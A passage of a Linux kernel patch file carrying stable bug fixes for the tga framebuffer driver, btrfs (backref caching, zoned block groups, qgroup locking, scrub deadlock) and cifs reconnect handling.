+ 	struct tga_par *par = (struct tga_par *)info->par;
+ 
++	if (!var->pixclock)
++		return -EINVAL;
++
+ 	if (par->tga_type == TGA_TYPE_8PLANE) {
+ 		if (var->bits_per_pixel != 8)
+ 			return -EINVAL;
+diff --git a/fs/btrfs/backref.c b/fs/btrfs/backref.c
+index 46851511b661b..0d7ae20e39c9a 100644
+--- a/fs/btrfs/backref.c
++++ b/fs/btrfs/backref.c
+@@ -1895,8 +1895,7 @@ int btrfs_is_data_extent_shared(struct btrfs_inode *inode, u64 bytenr,
+ 	ULIST_ITER_INIT(&uiter);
+ 	ctx->use_path_cache = true;
+ 	while (1) {
+-		bool is_shared;
+-		bool cached;
++		const unsigned long prev_ref_count = ctx->refs.nnodes;
+ 
+ 		walk_ctx.bytenr = bytenr;
+ 		ret = find_parent_nodes(&walk_ctx, &shared);
+@@ -1914,21 +1913,36 @@ int btrfs_is_data_extent_shared(struct btrfs_inode *inode, u64 bytenr,
+ 		ret = 0;
+ 
+ 		/*
+-		 * If our data extent was not directly shared (without multiple
+-		 * reference items), than it might have a single reference item
+-		 * with a count > 1 for the same offset, which means there are 2
+-		 * (or more) file extent items that point to the data extent -
+-		 * this happens when a file extent item needs to be split and
+-		 * then one item gets moved to another leaf due to a b+tree leaf
+-		 * split when inserting some item. In this case the file extent
+-		 * items may be located in different leaves and therefore some
+-		 * of the leaves may be referenced through shared subtrees while
+-		 * others are not. Since our extent buffer cache only works for
+-		 * a single path (by far the most common case and simpler to
+-		 * deal with), we can not use it if we have multiple leaves
+-		 * (which implies multiple paths).
++		 * More than one extent buffer (bytenr) may have been added to
++		 * the ctx->refs ulist, in which case we have to check multiple
++		 * tree paths in case the first one is not shared, so we can not
++		 * use the path cache which is made for a single path. Multiple
++		 * extent buffers at the current level happen when:
++		 *
++		 * 1) level -1, the data extent: If our data extent was not
++		 *    directly shared (without multiple reference items), then
++		 *    it might have a single reference item with a count > 1 for
++		 *    the same offset, which means there are 2 (or more) file
++		 *    extent items that point to the data extent - this happens
++		 *    when a file extent item needs to be split and then one
++		 *    item gets moved to another leaf due to a b+tree leaf split
++		 *    when inserting some item. In this case the file extent
++		 *    items may be located in different leaves and therefore
++		 *    some of the leaves may be referenced through shared
++		 *    subtrees while others are not. Since our extent buffer
++		 *    cache only works for a single path (by far the most common
++		 *    case and simpler to deal with), we can not use it if we
++		 *    have multiple leaves (which implies multiple paths).
++		 *
++		 * 2) level >= 0, a tree node/leaf: We can have a mix of direct
++		 *    and indirect references on a b+tree node/leaf, so we have
++		 *    to check multiple paths, and the extent buffer (the
++		 *    current bytenr) may be shared or not. One example is
++		 *    during relocation as we may get a shared tree block ref
++		 *    (direct ref) and a non-shared tree block ref (indirect
++		 *    ref) for the same node/leaf.
+ 		 */
+-		if (level == -1 && ctx->refs.nnodes > 1)
++		if ((ctx->refs.nnodes - prev_ref_count) > 1)
+ 			ctx->use_path_cache = false;
+ 
+ 		if (level >= 0)
+@@ -1938,18 +1952,45 @@ int btrfs_is_data_extent_shared(struct btrfs_inode *inode, u64 bytenr,
+ 		if (!node)
+ 			break;
+ 		bytenr = node->val;
+-		level++;
+-		cached = lookup_backref_shared_cache(ctx, root, bytenr, level,
+-						     &is_shared);
+-		if (cached) {
+-			ret = (is_shared ? 1 : 0);
+-			break;
++		if (ctx->use_path_cache) {
++			bool is_shared;
++			bool cached;
++
++			level++;
++			cached = lookup_backref_shared_cache(ctx, root, bytenr,
++							     level, &is_shared);
++			if (cached) {
++				ret = (is_shared ? 1 : 0);
++				break;
++			}
+ 		}
+ 		shared.share_count = 0;
+ 		shared.have_delayed_delete_refs = false;
+ 		cond_resched();
+ 	}
+ 
++	/*
++	 * If the path cache is disabled, then it means at some tree level we
++	 * got multiple parents due to a mix of direct and indirect backrefs or
++	 * multiple leaves with file extent items pointing to the same data
++	 * extent. We have to invalidate the cache and cache only the sharedness
++	 * result for the levels where we got only one node/reference.
++	 */
++	if (!ctx->use_path_cache) {
++		int i = 0;
++
++		level--;
++		if (ret >= 0 && level >= 0) {
++			bytenr = ctx->path_cache_entries[level].bytenr;
++			ctx->use_path_cache = true;
++			store_backref_shared_cache(ctx, root, bytenr, level, ret);
++			i = level + 1;
++		}
++
++		for ( ; i < BTRFS_MAX_LEVEL; i++)
++			ctx->path_cache_entries[i].bytenr = 0;
++	}
++
+ 	/*
+ 	 * Cache the sharedness result for the data extent if we know our inode
+ 	 * has more than 1 file extent item that refers to the data extent.
+diff --git a/fs/btrfs/block-group.c b/fs/btrfs/block-group.c
+index d628d545ffea7..c70a888bf8bf6 100644
+--- a/fs/btrfs/block-group.c
++++ b/fs/btrfs/block-group.c
+@@ -1036,14 +1036,8 @@ int btrfs_remove_block_group(struct btrfs_trans_handle *trans,
+ 			< block_group->zone_unusable);
+ 		WARN_ON(block_group->space_info->disk_total
+ 			< block_group->length * factor);
+-		WARN_ON(test_bit(BLOCK_GROUP_FLAG_ZONE_IS_ACTIVE,
+-				 &block_group->runtime_flags) &&
+-			block_group->space_info->active_total_bytes
+-			< block_group->length);
+ 	}
+ 	block_group->space_info->total_bytes -= block_group->length;
+-	if (test_bit(BLOCK_GROUP_FLAG_ZONE_IS_ACTIVE, &block_group->runtime_flags))
+-		block_group->space_info->active_total_bytes -= block_group->length;
+ 	block_group->space_info->bytes_readonly -=
+ 		(block_group->length - block_group->zone_unusable);
+ 	block_group->space_info->bytes_zone_unusable -=
+@@ -3342,13 +3336,15 @@ int btrfs_update_block_group(struct btrfs_trans_handle *trans,
+ 	spin_unlock(&info->delalloc_root_lock);
+ 
+ 	while (total) {
+-		bool reclaim;
++		struct btrfs_space_info *space_info;
++		bool reclaim = false;
+ 
+ 		cache = btrfs_lookup_block_group(info, bytenr);
+ 		if (!cache) {
+ 			ret = -ENOENT;
+ 			break;
+ 		}
++		space_info = cache->space_info;
+ 		factor = btrfs_bg_type_to_factor(cache->flags);
+ 
+ 		/*
+@@ -3363,7 +3359,7 @@ int btrfs_update_block_group(struct btrfs_trans_handle *trans,
+ 		byte_in_group = bytenr - cache->start;
+ 		WARN_ON(byte_in_group > cache->length);
+ 
+-		spin_lock(&cache->space_info->lock);
++		spin_lock(&space_info->lock);
+ 		spin_lock(&cache->lock);
+ 
+ 		if (btrfs_test_opt(info, SPACE_CACHE) &&
+@@ -3376,23 +3372,23 @@ int btrfs_update_block_group(struct btrfs_trans_handle *trans,
+ 			old_val += num_bytes;
+ 			cache->used = old_val;
+ 			cache->reserved -= num_bytes;
+-			cache->space_info->bytes_reserved -= num_bytes;
+-			cache->space_info->bytes_used += num_bytes;
+-			cache->space_info->disk_used += num_bytes * factor;
++			space_info->bytes_reserved -= num_bytes;
++			space_info->bytes_used += num_bytes;
++			space_info->disk_used += num_bytes * factor;
+ 			spin_unlock(&cache->lock);
+-			spin_unlock(&cache->space_info->lock);
++			spin_unlock(&space_info->lock);
+ 		} else {
+ 			old_val -= num_bytes;
+ 			cache->used = old_val;
+ 			cache->pinned += num_bytes;
+-			btrfs_space_info_update_bytes_pinned(info,
+-					cache->space_info, num_bytes);
+-			cache->space_info->bytes_used -= num_bytes;
+-			cache->space_info->disk_used -= num_bytes * factor;
++			btrfs_space_info_update_bytes_pinned(info, space_info,
++							     num_bytes);
++			space_info->bytes_used -= num_bytes;
++			space_info->disk_used -= num_bytes * factor;
+ 
+ 			reclaim = should_reclaim_block_group(cache, num_bytes);
+ 			spin_unlock(&cache->lock);
+-			spin_unlock(&cache->space_info->lock);
++			spin_unlock(&space_info->lock);
+ 
+ 			set_extent_dirty(&trans->transaction->pinned_extents,
+ 					 bytenr, bytenr + num_bytes - 1,
+diff --git a/fs/btrfs/free-space-cache.c b/fs/btrfs/free-space-cache.c
+index 0d250d052487c..d84cef89cdff5 100644
+--- a/fs/btrfs/free-space-cache.c
++++ b/fs/btrfs/free-space-cache.c
+@@ -2693,8 +2693,13 @@ static int __btrfs_add_free_space_zoned(struct btrfs_block_group *block_group,
+ 		bg_reclaim_threshold = READ_ONCE(sinfo->bg_reclaim_threshold);
+ 
+ 	spin_lock(&ctl->tree_lock);
++	/* Count initial region as zone_unusable until it gets activated. */
+ 	if (!used)
+ 		to_free = size;
++	else if (initial &&
++		 test_bit(BTRFS_FS_ACTIVE_ZONE_TRACKING, &block_group->fs_info->flags) &&
++		 (block_group->flags & (BTRFS_BLOCK_GROUP_METADATA | BTRFS_BLOCK_GROUP_SYSTEM)))
++		to_free = 0;
+ 	else if (initial)
+ 		to_free = block_group->zone_capacity;
+ 	else if (offset >= block_group->alloc_offset)
+@@ -2722,7 +2727,8 @@ static int __btrfs_add_free_space_zoned(struct btrfs_block_group *block_group,
+ 	reclaimable_unusable = block_group->zone_unusable -
+ 			       (block_group->length - block_group->zone_capacity);
+ 	/* All the region is now unusable. Mark it as unused and reclaim */
+-	if (block_group->zone_unusable == block_group->length) {
++	if (block_group->zone_unusable == block_group->length &&
++	    block_group->alloc_offset) {
+ 		btrfs_mark_bg_unused(block_group);
+ 	} else if (bg_reclaim_threshold &&
+ 		   reclaimable_unusable >=
+diff --git a/fs/btrfs/fs.h b/fs/btrfs/fs.h
+index 3d8156fc8523f..f180ca061aef4 100644
+--- a/fs/btrfs/fs.h
++++ b/fs/btrfs/fs.h
+@@ -119,11 +119,8 @@ enum {
+ 	/* Indicate that we want to commit the transaction. */
+ 	BTRFS_FS_NEED_TRANS_COMMIT,
+ 
+-	/*
+-	 * Indicate metadata over-commit is disabled. This is set when active
+-	 * zone tracking is needed.
+-	 */
+-	BTRFS_FS_NO_OVERCOMMIT,
++	/* This is set when active zone tracking is needed. */
++	BTRFS_FS_ACTIVE_ZONE_TRACKING,
+ 
+ 	/*
+ 	 * Indicate if we have some features changed, this is mostly for
+diff --git a/fs/btrfs/ioctl.c b/fs/btrfs/ioctl.c
+index 7e348bd2ccdeb..c232636ecdfea 100644
+--- a/fs/btrfs/ioctl.c
++++ b/fs/btrfs/ioctl.c
+@@ -3731,7 +3731,9 @@ static long btrfs_ioctl_qgroup_assign(struct file *file, void __user *arg)
+ 	}
+ 
+ 	/* update qgroup status and info */
++	mutex_lock(&fs_info->qgroup_ioctl_lock);
+ 	err = btrfs_run_qgroups(trans);
++	mutex_unlock(&fs_info->qgroup_ioctl_lock);
+ 	if (err < 0)
+ 		btrfs_handle_fs_error(fs_info, err,
+ 				      "failed to update qgroup status and info");
+diff --git a/fs/btrfs/qgroup.c b/fs/btrfs/qgroup.c
+index af97413abcf43..abf2b7f143078 100644
+--- a/fs/btrfs/qgroup.c
++++ b/fs/btrfs/qgroup.c
+@@ -2828,13 +2828,22 @@ cleanup:
+ }
+ 
+ /*
+- * called from commit_transaction. Writes all changed qgroups to disk.
++ * Writes all changed qgroups to disk.
++ * Called by the transaction commit path and the qgroup assign ioctl.
+  */
+ int btrfs_run_qgroups(struct btrfs_trans_handle *trans)
+ {
+ 	struct btrfs_fs_info *fs_info = trans->fs_info;
+ 	int ret = 0;
+ 
++	/*
++	 * In case we are called from the qgroup assign ioctl, assert that we
++	 * are holding the qgroup_ioctl_lock, otherwise we can race with a quota
++	 * disable operation (ioctl) and access a freed quota root.
++	 */
++	if (trans->transaction->state != TRANS_STATE_COMMIT_DOING)
++		lockdep_assert_held(&fs_info->qgroup_ioctl_lock);
++
+ 	if (!fs_info->quota_root)
+ 		return ret;
+ 
+diff --git a/fs/btrfs/space-info.c b/fs/btrfs/space-info.c
+index 69c09508afb50..3eecce86f63fc 100644
+--- a/fs/btrfs/space-info.c
++++ b/fs/btrfs/space-info.c
+@@ -308,8 +308,6 @@ void btrfs_add_bg_to_space_info(struct btrfs_fs_info *info,
+ 	ASSERT(found);
+ 	spin_lock(&found->lock);
+ 	found->total_bytes += block_group->length;
+-	if (test_bit(BLOCK_GROUP_FLAG_ZONE_IS_ACTIVE, &block_group->runtime_flags))
+-		found->active_total_bytes += block_group->length;
+ 	found->disk_total += block_group->length * factor;
+ 	found->bytes_used += block_group->used;
+ 	found->disk_used += block_group->used * factor;
+@@ -379,22 +377,6 @@ static u64 calc_available_free_space(struct btrfs_fs_info *fs_info,
+ 	return avail;
+ }
+ 
+-static inline u64 writable_total_bytes(struct btrfs_fs_info *fs_info,
+-				       struct btrfs_space_info *space_info)
+-{
+-	/*
+-	 * On regular filesystem, all total_bytes are always writable. On zoned
+-	 * filesystem, there may be a limitation imposed by max_active_zones.
+-	 * For metadata allocation, we cannot finish an existing active block
+-	 * group to avoid a deadlock. Thus, we need to consider only the active
+-	 * groups to be writable for metadata space.
+-	 */
+-	if (!btrfs_is_zoned(fs_info) || (space_info->flags & BTRFS_BLOCK_GROUP_DATA))
+-		return space_info->total_bytes;
+-
+-	return space_info->active_total_bytes;
+-}
+-
+ int btrfs_can_overcommit(struct btrfs_fs_info *fs_info,
+ 			 struct btrfs_space_info *space_info, u64 bytes,
+ 			 enum btrfs_reserve_flush_enum flush)
+@@ -407,13 +389,13 @@ int btrfs_can_overcommit(struct btrfs_fs_info *fs_info,
+ 		return 0;
+ 
+ 	used = btrfs_space_info_used(space_info, true);
+-	if (test_bit(BTRFS_FS_NO_OVERCOMMIT, &fs_info->flags) &&
++	if (test_bit(BTRFS_FS_ACTIVE_ZONE_TRACKING, &fs_info->flags) &&
+ 	    (space_info->flags & BTRFS_BLOCK_GROUP_METADATA))
+ 		avail = 0;
+ 	else
+ 		avail = calc_available_free_space(fs_info, space_info, flush);
+ 
+-	if (used + bytes < writable_total_bytes(fs_info, space_info) + avail)
++	if (used + bytes < space_info->total_bytes + avail)
+ 		return 1;
+ 	return 0;
+ }
+@@ -449,7 +431,7 @@ again:
+ 		ticket = list_first_entry(head, struct reserve_ticket, list);
+ 
+ 		/* Check and see if our ticket can be satisfied now. */
+-		if ((used + ticket->bytes <= writable_total_bytes(fs_info, space_info)) ||
++		if ((used + ticket->bytes <= space_info->total_bytes) ||
+ 		    btrfs_can_overcommit(fs_info, space_info, ticket->bytes,
+ 					 flush)) {
+ 			btrfs_space_info_update_bytes_may_use(fs_info,
+@@ -829,7 +811,6 @@ btrfs_calc_reclaim_metadata_size(struct btrfs_fs_info *fs_info,
+ {
+ 	u64 used;
+ 	u64 avail;
+-	u64 total;
+ 	u64 to_reclaim = space_info->reclaim_size;
+ 
+ 	lockdep_assert_held(&space_info->lock);
+@@ -844,9 +825,8 @@ btrfs_calc_reclaim_metadata_size(struct btrfs_fs_info *fs_info,
+ 	 * space.  If that's the case add in our overage so we make sure to put
+ 	 * appropriate pressure on the flushing state machine.
+ 	 */
+-	total = writable_total_bytes(fs_info, space_info);
+-	if (total + avail < used)
+-		to_reclaim += used - (total + avail);
++	if (space_info->total_bytes + avail < used)
++		to_reclaim += used - (space_info->total_bytes + avail);
+ 
+ 	return to_reclaim;
+ }
+@@ -856,11 +836,10 @@ static bool need_preemptive_reclaim(struct btrfs_fs_info *fs_info,
+ {
+ 	u64 global_rsv_size = fs_info->global_block_rsv.reserved;
+ 	u64 ordered, delalloc;
+-	u64 total = writable_total_bytes(fs_info, space_info);
+ 	u64 thresh;
+ 	u64 used;
+ 
+-	thresh = mult_perc(total, 90);
++	thresh = mult_perc(space_info->total_bytes, 90);
+ 
+ 	lockdep_assert_held(&space_info->lock);
+ 
+@@ -923,8 +902,8 @@ static bool need_preemptive_reclaim(struct btrfs_fs_info *fs_info,
+ 					   BTRFS_RESERVE_FLUSH_ALL);
+ 	used = space_info->bytes_used + space_info->bytes_reserved +
+ 	       space_info->bytes_readonly + global_rsv_size;
+-	if (used < total)
+-		thresh += total - used;
++	if (used < space_info->total_bytes)
++		thresh += space_info->total_bytes - used;
+ 	thresh >>= space_info->clamp;
+ 
+ 	used = space_info->bytes_pinned;
+@@ -1651,7 +1630,7 @@ static int __reserve_bytes(struct btrfs_fs_info *fs_info,
+ 	 * can_overcommit() to ensure we can overcommit to continue.
+ 	 */
+ 	if (!pending_tickets &&
+-	    ((used + orig_bytes <= writable_total_bytes(fs_info, space_info)) ||
++	    ((used + orig_bytes <= space_info->total_bytes) ||
+ 	     btrfs_can_overcommit(fs_info, space_info, orig_bytes, flush))) {
+ 		btrfs_space_info_update_bytes_may_use(fs_info, space_info,
+ 						      orig_bytes);
+@@ -1665,8 +1644,7 @@ static int __reserve_bytes(struct btrfs_fs_info *fs_info,
+ 	 */
+ 	if (ret && unlikely(flush == BTRFS_RESERVE_FLUSH_EMERGENCY)) {
+ 		used = btrfs_space_info_used(space_info, false);
+-		if (used + orig_bytes <=
+-		    writable_total_bytes(fs_info, space_info)) {
++		if (used + orig_bytes <= space_info->total_bytes) {
+ 			btrfs_space_info_update_bytes_may_use(fs_info, space_info,
+ 							      orig_bytes);
+ 			ret = 0;
+diff --git a/fs/btrfs/space-info.h b/fs/btrfs/space-info.h
+index fc99ea2b0c34f..2033b71b18cec 100644
+--- a/fs/btrfs/space-info.h
++++ b/fs/btrfs/space-info.h
+@@ -96,8 +96,6 @@ struct btrfs_space_info {
+ 	u64 bytes_may_use;	/* number of bytes that may be used for
+ 				   delalloc/allocations */
+ 	u64 bytes_readonly;	/* total bytes that are read only */
+-	/* Total bytes in the space, but only accounts active block groups. */
+-	u64 active_total_bytes;
+ 	u64 bytes_zone_unusable;	/* total bytes that are unusable until
+ 					   resetting the device zone */
+ 
+diff --git a/fs/btrfs/transaction.c b/fs/btrfs/transaction.c
+index 8f8d0fce6e4a3..9094e2402922c 100644
+--- a/fs/btrfs/transaction.c
++++ b/fs/btrfs/transaction.c
+@@ -2035,7 +2035,20 @@ static void cleanup_transaction(struct btrfs_trans_handle *trans, int err)
+ 
+ 	if (current->journal_info == trans)
+ 		current->journal_info = NULL;
+-	btrfs_scrub_cancel(fs_info);
++
++	/*
++	 * If relocation is running, we can't cancel scrub because that will
++	 * result in a deadlock. Before relocating a block group, relocation
++	 * pauses scrub, then starts and commits a transaction before unpausing
++	 * scrub. If the transaction commit is being done by the relocation
++	 * task or triggered by another task and the relocation task is waiting
++	 * for the commit, and we end up here due to an error in the commit
++	 * path, then calling btrfs_scrub_cancel() will deadlock, as we are
++	 * asking for scrub to stop while having it asked to be paused higher
++	 * above in relocation code.
++	 */
++	if (!test_bit(BTRFS_FS_RELOC_RUNNING, &fs_info->flags))
++		btrfs_scrub_cancel(fs_info);
+ 
+ 	kmem_cache_free(btrfs_trans_handle_cachep, trans);
+ }
+diff --git a/fs/btrfs/volumes.c b/fs/btrfs/volumes.c
+index df43093b7a46d..fe652f8fc697b 100644
+--- a/fs/btrfs/volumes.c
++++ b/fs/btrfs/volumes.c
+@@ -1366,8 +1366,17 @@ struct btrfs_device *btrfs_scan_one_device(const char *path, fmode_t flags,
+ 	 * So, we need to add a special mount option to scan for
+ 	 * later supers, using BTRFS_SUPER_MIRROR_MAX instead
+ 	 */
+-	flags |= FMODE_EXCL;
+ 
++	/*
++	 * Avoid using flag |= FMODE_EXCL here, as the systemd-udev may
++	 * initiate the device scan which may race with the user's mount
++	 * or mkfs command, resulting in failure.
++	 * Since the device scan is solely for reading purposes, there is
++	 * no need for FMODE_EXCL. Additionally, the devices are read again
++	 * during the mount process. It is ok to get some inconsistent
++	 * values temporarily, as the device paths of the fsid are the only
++	 * required information for assembling the volume.
++	 */
+ 	bdev = blkdev_get_by_path(path, flags, holder);
+ 	if (IS_ERR(bdev))
+ 		return ERR_CAST(bdev);
+@@ -3266,8 +3275,15 @@ int btrfs_relocate_chunk(struct btrfs_fs_info *fs_info, u64 chunk_offset)
+ 	btrfs_scrub_pause(fs_info);
+ 	ret = btrfs_relocate_block_group(fs_info, chunk_offset);
+ 	btrfs_scrub_continue(fs_info);
+-	if (ret)
++	if (ret) {
++		/*
++		 * If we had a transaction abort, stop all running scrubs.
++		 * See transaction.c:cleanup_transaction() why we do it here.
++		 */
++		if (BTRFS_FS_ERROR(fs_info))
++			btrfs_scrub_cancel(fs_info);
+ 		return ret;
++	}
+ 
+ 	block_group = btrfs_lookup_block_group(fs_info, chunk_offset);
+ 	if (!block_group)
+diff --git a/fs/btrfs/zoned.c b/fs/btrfs/zoned.c
+index f3b7d8ae93a9f..ce5ebba7fdd9a 100644
+--- a/fs/btrfs/zoned.c
++++ b/fs/btrfs/zoned.c
+@@ -539,8 +539,7 @@ int btrfs_get_dev_zone_info(struct btrfs_device *device, bool populate_cache)
+ 		}
+ 		atomic_set(&zone_info->active_zones_left,
+ 			   max_active_zones - nactive);
+-		/* Overcommit does not work well with active zone tacking. */
+-		set_bit(BTRFS_FS_NO_OVERCOMMIT, &fs_info->flags);
++		set_bit(BTRFS_FS_ACTIVE_ZONE_TRACKING, &fs_info->flags);
+ 	}
+ 
+ 	/* Validate superblock log */
+@@ -1577,9 +1576,19 @@ void btrfs_calc_zone_unusable(struct btrfs_block_group *cache)
+ 		return;
+ 
+ 	WARN_ON(cache->bytes_super != 0);
+-	unusable = (cache->alloc_offset - cache->used) +
+-		   (cache->length - cache->zone_capacity);
+-	free = cache->zone_capacity - cache->alloc_offset;
++
++	/* Check for block groups never get activated */
++	if (test_bit(BTRFS_FS_ACTIVE_ZONE_TRACKING, &cache->fs_info->flags) &&
++	    cache->flags & (BTRFS_BLOCK_GROUP_METADATA | BTRFS_BLOCK_GROUP_SYSTEM) &&
++	    !test_bit(BLOCK_GROUP_FLAG_ZONE_IS_ACTIVE, &cache->runtime_flags) &&
++	    cache->alloc_offset == 0) {
++		unusable = cache->length;
++		free = 0;
++	} else {
++		unusable = (cache->alloc_offset - cache->used) +
++			   (cache->length - cache->zone_capacity);
++		free = cache->zone_capacity - cache->alloc_offset;
++	}
+ 
+ 	/* We only need ->free_space in ALLOC_SEQ block groups */
+ 	cache->cached = BTRFS_CACHE_FINISHED;
+@@ -1916,7 +1925,11 @@ bool btrfs_zone_activate(struct btrfs_block_group *block_group)
+ 
+ 	/* Successfully activated all the zones */
+ 	set_bit(BLOCK_GROUP_FLAG_ZONE_IS_ACTIVE, &block_group->runtime_flags);
+-	space_info->active_total_bytes += block_group->length;
++	WARN_ON(block_group->alloc_offset != 0);
++	if (block_group->zone_unusable == block_group->length) {
++		block_group->zone_unusable = block_group->length - block_group->zone_capacity;
++		space_info->bytes_zone_unusable -= block_group->zone_capacity;
++	}
+ 	spin_unlock(&block_group->lock);
+ 	btrfs_try_granting_tickets(fs_info, space_info);
+ 	spin_unlock(&space_info->lock);
+@@ -2280,7 +2293,7 @@ int btrfs_zone_finish_one_bg(struct btrfs_fs_info *fs_info)
+ 		u64 avail;
+ 
+ 		spin_lock(&block_group->lock);
+-		if (block_group->reserved ||
++		if (block_group->reserved || block_group->alloc_offset == 0 ||
+ 		    (block_group->flags & BTRFS_BLOCK_GROUP_SYSTEM)) {
+ 			spin_unlock(&block_group->lock);
+ 			continue;
+@@ -2317,10 +2330,6 @@ int btrfs_zoned_activate_one_bg(struct btrfs_fs_info *fs_info,
+ 	if (!btrfs_is_zoned(fs_info) || (space_info->flags & BTRFS_BLOCK_GROUP_DATA))
+ 		return 0;
+ 
+-	/* No more block groups to activate */
+-	if (space_info->active_total_bytes == space_info->total_bytes)
+-		return 0;
+-
+ 	for (;;) {
+ 		int ret;
+ 		bool need_finish = false;
+diff --git a/fs/cifs/cifsfs.h b/fs/cifs/cifsfs.h
+index 63a0ac2b93558..16a703c683b77 100644
+--- a/fs/cifs/cifsfs.h
++++ b/fs/cifs/cifsfs.h
+@@ -118,7 +118,10 @@ extern const struct dentry_operations cifs_ci_dentry_ops;
+ #ifdef CONFIG_CIFS_DFS_UPCALL
+ extern struct vfsmount *cifs_dfs_d_automount(struct path *path);
+ #else
+-#define cifs_dfs_d_automount NULL
++static inline struct vfsmount *cifs_dfs_d_automount(struct path *path)
++{
++	return ERR_PTR(-EREMOTE);
++}
+ #endif
+ 
+ /* Functions related to symlinks */
+diff --git a/fs/cifs/cifsproto.h b/fs/cifs/cifsproto.h
+index e75184544ecb4..639df85dafd6c 100644
+--- a/fs/cifs/cifsproto.h
++++ b/fs/cifs/cifsproto.h
+@@ -697,5 +697,6 @@ static inline int cifs_create_options(struct cifs_sb_info *cifs_sb, int options)
+ 
+ struct super_block *cifs_get_tcon_super(struct cifs_tcon *tcon);
+ void cifs_put_tcon_super(struct super_block *sb);
++int cifs_wait_for_server_reconnect(struct TCP_Server_Info *server, bool retry);
+ 
+ #endif			/* _CIFSPROTO_H */
+diff --git a/fs/cifs/cifssmb.c b/fs/cifs/cifssmb.c
+index 566e6a26b897c..f71f8533c2f4d 100644
+--- a/fs/cifs/cifssmb.c
++++ b/fs/cifs/cifssmb.c
+@@ -70,7 +70,6 @@ cifs_reconnect_tcon(struct cifs_tcon *tcon, int smb_command)
+ 	struct cifs_ses *ses;
+ 	struct TCP_Server_Info *server;
+ 	struct nls_table *nls_codepage;
+-	int retries;
+ 
+ 	/*
+ 	 * SMBs NegProt, SessSetup, uLogoff do not have tcon yet so check for
+@@ -98,45 +97,9 @@ cifs_reconnect_tcon(struct cifs_tcon *tcon, int smb_command)
+ 	}
+ 	spin_unlock(&tcon->tc_lock);
+ 
+-	retries = server->nr_targets;
+-
+-	/*
+-	 * Give demultiplex thread up to 10 seconds to each target available for
+-	 * reconnect -- should be greater than cifs socket timeout which is 7
+-	 * seconds.
+-	 */
+-	while (server->tcpStatus == CifsNeedReconnect) {
+-		rc = wait_event_interruptible_timeout(server->response_q,
+-						      (server->tcpStatus != CifsNeedReconnect),
+-						      10 * HZ);
+-		if (rc < 0) {
+-			cifs_dbg(FYI, "%s: aborting reconnect due to a received signal by the process\n",
+-				 __func__);
+-			return -ERESTARTSYS;
+-		}
+-
+-		/* are we still trying to reconnect? */
+-		spin_lock(&server->srv_lock);
+-		if (server->tcpStatus != CifsNeedReconnect) {
+-			spin_unlock(&server->srv_lock);
+-			break;
+-		}
+-		spin_unlock(&server->srv_lock);
+-
+-		if (retries && --retries)
+-			continue;
+-
+-		/*
+-		 * on "soft" mounts we wait once. Hard mounts keep
+-		 * retrying until process is killed or server comes
+-		 * back on-line
+-		 */
+-		if (!tcon->retry) {
+-			cifs_dbg(FYI, "gave up waiting on reconnect in smb_init\n");
+-			return -EHOSTDOWN;
+-		}
+-		retries = server->nr_targets;
+-	}
++	rc = cifs_wait_for_server_reconnect(server, tcon->retry);
++	if (rc)
++		return rc;
+ 
+ 	spin_lock(&ses->chan_lock);
+ 	if (!cifs_chan_needs_reconnect(ses, server) && !tcon->need_reconnect) {
+@@ -4414,8 +4377,13 @@ CIFSGetDFSRefer(const unsigned int xid, struct cifs_ses *ses,
+ 		return -ENODEV;
+ 
+ getDFSRetry:
+-	rc = smb_init(SMB_COM_TRANSACTION2, 15, ses->tcon_ipc, (void **) &pSMB,
+-		      (void **) &pSMBr);
++	/*
++	 * Use smb_init_no_reconnect() instead of smb_init() as
++	 * CIFSGetDFSRefer() may be called from cifs_reconnect_tcon() and thus
++	 * causing an infinite recursion.
++	 */
++	rc = smb_init_no_reconnect(SMB_COM_TRANSACTION2, 15, ses->tcon_ipc,
++				   (void **)&pSMB, (void **)&pSMBr);
+ 	if (rc)
+ 		return rc;
+ 
+diff --git a/fs/cifs/connect.c b/fs/cifs/connect.c
+index 6da2af97b8bac..985e962cf0858 100644
+--- a/fs/cifs/connect.c
++++ b/fs/cifs/connect.c
+@@ -244,31 +244,42 @@ cifs_mark_tcp_ses_conns_for_reconnect(struct TCP_Server_Info *server,
+ 			cifs_chan_update_iface(ses, server);
+ 
+ 		spin_lock(&ses->chan_lock);
+-		if (!mark_smb_session && cifs_chan_needs_reconnect(ses, server))
+-			goto next_session;
++		if (!mark_smb_session && cifs_chan_needs_reconnect(ses, server)) {
++			spin_unlock(&ses->chan_lock);
++			continue;
++		}
+ 
+ 		if (mark_smb_session)
+ 			CIFS_SET_ALL_CHANS_NEED_RECONNECT(ses);
+ 		else
+ 			cifs_chan_set_need_reconnect(ses, server);
+ 
++		cifs_dbg(FYI, "%s: channel connect bitmap: 0x%lx\n",
++			 __func__, ses->chans_need_reconnect);
++
+ 		/* If all channels need reconnect, then tcon needs reconnect */
+-		if (!mark_smb_session && !CIFS_ALL_CHANS_NEED_RECONNECT(ses))
+-			goto next_session;
++		if (!mark_smb_session && !CIFS_ALL_CHANS_NEED_RECONNECT(ses)) {
++			spin_unlock(&ses->chan_lock);
++			continue;
++		}
++		spin_unlock(&ses->chan_lock);
+ 
++		spin_lock(&ses->ses_lock);
+ 		ses->ses_status = SES_NEED_RECON;
++		spin_unlock(&ses->ses_lock);
+ 
+ 		list_for_each_entry(tcon, &ses->tcon_list, tcon_list) {
+ 			tcon->need_reconnect = true;
++			spin_lock(&tcon->tc_lock);
+ 			tcon->status = TID_NEED_RECON;
++			spin_unlock(&tcon->tc_lock);
+ 		}
+ 		if (ses->tcon_ipc) {
+ 			ses->tcon_ipc->need_reconnect = true;
++			spin_lock(&ses->tcon_ipc->tc_lock);
+ 			ses->tcon_ipc->status = TID_NEED_RECON;
++			spin_unlock(&ses->tcon_ipc->tc_lock);
+ 		}
+-
+-next_session:
+-		spin_unlock(&ses->chan_lock);
+ 	}
+ 	spin_unlock(&cifs_tcp_ses_lock);
+ }
+@@ -3703,11 +3714,19 @@ cifs_negotiate_protocol(const unsigned int xid, struct cifs_ses *ses,
+ 
+ 	/* only send once per connect */
+ 	spin_lock(&server->srv_lock);
+-	if (!server->ops->need_neg(server) ||
++	if (server->tcpStatus != CifsGood &&
++	    server->tcpStatus != CifsNew &&
+ 	    server->tcpStatus != CifsNeedNegotiate) {
++		spin_unlock(&server->srv_lock);
++		return -EHOSTDOWN;
++	}
++
++	if (!server->ops->need_neg(server) &&
++	    server->tcpStatus == CifsGood) {
+ 		spin_unlock(&server->srv_lock);
+ 		return 0;
+ 	}
++
+ 	server->tcpStatus = CifsInNegotiate;
+ 	spin_unlock(&server->srv_lock);
+ 
